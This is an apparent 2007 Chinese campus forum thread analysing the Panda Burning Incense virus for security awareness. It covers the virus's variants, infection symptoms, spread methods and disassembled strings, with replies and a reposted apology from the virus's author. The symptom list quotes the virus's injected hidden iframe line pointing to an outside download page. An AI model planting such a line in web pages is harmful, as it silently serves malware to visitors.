就熊猫烧香说说网络安全意识

scship

之前在工大后院发过2篇安全意识的文章，估计也没几个会看。。。一直心淡不想再为广工的安全事业做些贡献。

又由于最近考试压迫的厉害，也没时间去搞这些东西（我不是计机的。。。），一直到今晚还剩下一科单片机开卷考，就有空到后院来看看。。。一堆中毒者在问这问那。。。其实真正的高手是很少来这里的，就算来都是随便看看，也不会一个一个的回答那些对他们来说简单到极点的问题。。。我不是高手，所以我觉得还是应该出来为后院做点事情。。。继续没人看也没关系，我照样写给我mm看。。。

这文章的目的还是要提高大家的安全意识，所以对熊猫烧香的预防啊杀毒啊我写的很随便，详细的大家上网找就可以了。

我大概去年10底知道接触这个病毒，但是当时还没有流行起来，一般杀软都把它当成“尼姆亚”病毒。但是经过几个月的变种，它可是红透大江南北。网上分析的变种有4种，如下：

    A       病毒将自身复制为%System32%\****Jacks.exe,然后感染除特殊文件夹之外的文件夹中的可执行文件。
    B       病毒将自身复制为%System32%\Drivers\spoclsv.exe,感染时在c盘根目录下生成感染标记文件。
    C       病毒不再感染用户系统中的可执行文件，而是感染用户系统中的脚本病毒(这样的危害更大)?在每个感染后的文件夹中写下感染标记文件。
    D       感染用户可执行文件时不再使用A和B版本中的直接捆绑感染。用户中毒后可执行程序的图标不改变(a和b版本感染后可执行文件的图标都变成熊猫烧香)。


我问了些专门搞病毒的网友拿到了样本，用虚拟机试试，中毒情况如下：

中毒表象:以下几个特征为中毒的表现:
    １、在系统中的每分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。
    ２、无法手工修改"文件夹选项"将隐藏的文件显示出来。
    ３、在每个感染后的文件夹中可见Desktop_.ini长度为12字节的隐藏文件(这个和Viking病毒一样)。
    ４、机器上的所有脚本文件(*.htm?*.html?*.asp?*.php?*.js?*.aspx)中存在以下代码:
    <iframesrc="http://www.ctv163.com/wuhan/down.htm"width="0"height="0"frameborder="0"></iframe>'

这里估计作者是武汉人！？哈哈。。。所以这病毒也叫“武汉男生下载者”。


    ５、中毒后机器上的常见反病毒软件无法开启和正常使用。
    ６、无法正常使用任务管理器、icesword之类的系统检测工具。
    ７、进程中可以找到伪系统正常进程的spoclsv.exe病毒进程。
    ８、系统自启动项中有病毒添加的注册表自启动项。
    ９、无故的向外发包、连接局域网中的其它机器。

其实这个病毒新技术是一个都没有的，只要有足够的安全意识是绝对不会中的（我班到现在还没有人中）

简单说说这个病毒用的的一些技术：

首先它是一个传染型的DownLoader（下载者），使用Delphi编写,从技术上来说它并没有什么创新之处，借鉴很多经典病毒，木马甚至是流氓软件的技术优点。任何一个技术单一拿出来杀毒软件都能应付。

首先它要传播是靠网马，通过06014等ie漏洞进行下毒。只要经常打补丁或者更新杀软的话根本就不会中的。前2篇文章我都一再提到了，这里就不说了。要文章的话请版主发了链接。


“复制文件到系统目录和根目录”，”添加注册表启动项“：这些都是非常常见的病毒或者木马的伎俩，实现方式网上很多源代码，想知道的可以去找找，或者计机的高手贴出来。

“利用微软自动播放功能运行”：这个就是大家常说的u盘病毒，比如威金病毒，盗Q黑侠等等都是用这方式扩大传播。

“针对计算机本身攻击弱口令”：这个前2篇文章提到的，比如xp默认的administrator空口令，135，139，445等端口没有关闭就给病毒在局域网有传播的机会了。

“利用IE浏览器漏洞在网页文件中添加脚本代码”：这些都是针对那些没有打补丁意识的。

上面分析我们知道，安全意识足够的话就肯定不怕这些落后的技术。在这里我随便提醒，最新的ie网马07004和07010都出现了，没有打补丁还是快点打，这2只网马我试07004，对ie是不闪不弹不卡的，跟06014差不多。。。危险度很高。

随便的说了几句，就不转到我blog了，以前的文章在我blog的以往文章分类里面的2006.9都可以找到  http://scship.blogspot.com


随便贴出些我逆向熊猫烧香的一小段代码给大家看看熊猫烧香的真面目

CODE:0040CBED             mov      edx,offsetaF          ；"***武*汉*男*生*感*染*下*载*者***"

CODE:0040CBF2            call    @System@@LStrAsg$qqrpvpxv

CODE:0040CBF7            mov      eax,offsetunk_40E7D8

CODE:0040CBFC             mov      edx,offsetaMMoperyAV ；"感谢艾玛,mopery对此木马的关注!~"

CODE:0040CC01            call   @System@@LStrAsg$qqrpvpxv

CODE:0040CC06            lea     ecx,[ebp+var_14]

CODE:0040CC09            mov      edx,offsetaXboy_0      ；"xboy"

CODE:0040CC0E            mov      eax,offsetaF_1        ；"***武*汉*男*生*感*染*下*载*者***"


病毒里面很清楚的可以看到这个病毒的一些信息。



                                                                                                    2007.1.25  
                                                                                                        BoXer

[ 本帖最后由 scship 于 2007-1-27 23:23 编辑 ]

qiqyfox

很长,先谢谢LZ~等我中了毒再来看~

admin

补充
http://shadu.baidu.com/sitenews/rank.jsp?id=171

捕蛇者说

BITDEFENDER一冲上去就解决了，真快

开水江

没中,还好.....看完,LZ辛苦地

scship

谢谢各位回帖的

72个看了4个回复的。。。

放假再发点其他的。。。

2002070344

比上两次写得好
后院分析virus的人很少
能谈进去就更好了

scship

谢谢版主
我会继续努力
无论后院怎样只要我在广工就会全力支持！

xor

我喜欢汇编(我也不是计机的，是电子的)，楼主好像喜欢用IDA，很想和楼主交流一下！

lantian

同2F。。。

scship

原帖由 xor 于 2007-2-10 01:58 发表
我喜欢汇编(我也不是计机的，是电子的)，楼主好像喜欢用IDA，很想和楼主交流一下！

好啊，大家一起交流交流！

不过我用od比较多。。。

scship

各位网友：
    你们好!我是熊猫烧香的第一版作者.
    我真的没有想到熊猫烧香在短短的两个月竟然疯狂感染到这个地步,真的是我的不对,或许
真的是我低估了网络的力量,它的散播速度是我想不到的!对于所有中毒的网友,企业来说,可能
是一个很大的打击,我对此表示深深的歉意!很对不起!
    我要解释一些事情,有人说熊猫烧香更改熊猫的图标是我在诋毁大熊猫!这里我要解释下,这
是绝对没有的事情,完全是出于这个图片比较让我个人喜欢,才会用的!
    还有关于变种,我写这个的初衷也是这个,纯粹是为了编程研究,对于出了这么多变种,我是
根本想不到的,这个责任也不全是在我的!还有人说熊猫病毒写出来是商业目的!这个完全是无稽
之谈.我在这里承诺,本人是绝对没有更新过任何变种!
    关于中毒后的一些错误,有人中毒后会有蓝屏,无声,卡死,文件丢失这些现象!蓝屏和死机的
原因很多可能,熊猫的主程序是不会造成电脑死机或蓝屏的,更不会把别人里面的文件弄丢失!
    还有人说我是个心理变态,我在前面已经说了,感染的速度,变种的数量是我所料想不到的.
还有,我写这个病毒的初衷完全是为了编程研究.对于这个评论,我也就不多说什么了!
    最后就是关于我的身份,大家不要再猜测我是谁了,15岁的武汉男生也好,是个女的也好,某
公司老总也好,杀毒厂商也好,光是新闻的评论,网友的臭骂已经让我后悔之极了!希望熊猫病毒
不要再成为炒作的娱乐新闻,不要再出任何关于熊猫新闻和评论!希望安全软件公司,不要吹嘘,
相互诋毁,相互炒作,尽力做出让人们信赖的好安全软件!谢谢大家!
    这是我写的一个专杀程序,肯定是比不上专业级的杀毒软件了,但是我想这是我最后能给大
家做的事情了.
    熊猫走了,是结束吗?不是的,网络永远没有安全的时候,或许在不久,会有很多更厉害的病毒
出来!所以我在这里提醒大家,提高网络安全意识,并不是你应该注意的,而是你必须懂得和去做
的一些事情!
    再一次表示深深的歉意,同时我发出这个专杀,愿能给大家带来帮助!

                                                   熊猫烧香的作者
                                             2007年2月9日于仙桃市第一看守所


终于提到安全意识了
我写那么多东西，熊猫作者做那么多事情
就是为那么点安全意识
大众都觉醒吧。

cpm6678775

........................好在，当时我大一还没电脑上网，哈哈！

水鱼

学到野拉,多谢LZ

广东工业小学

不上网,乜事都无

画多

关注食品安全多于网络安全...............

看客

很荣幸我是班里最早中招的人

xor

看了LZ的blog,发现LZ居然是个Cracker……文章写得不错啊。我以前也对Cracker感兴趣过，现在觉得做cracker太累了，难得去弄了，只是做游戏免光盘补丁、做游戏修改器之类的试试手~~

scship

楼上的我加你了吧？！

怎么不见你上Q的？

我不是cracker

如果是广工真正的cracker

应该是毕业了2年的 luocong 师兄，自动化的猛人。。。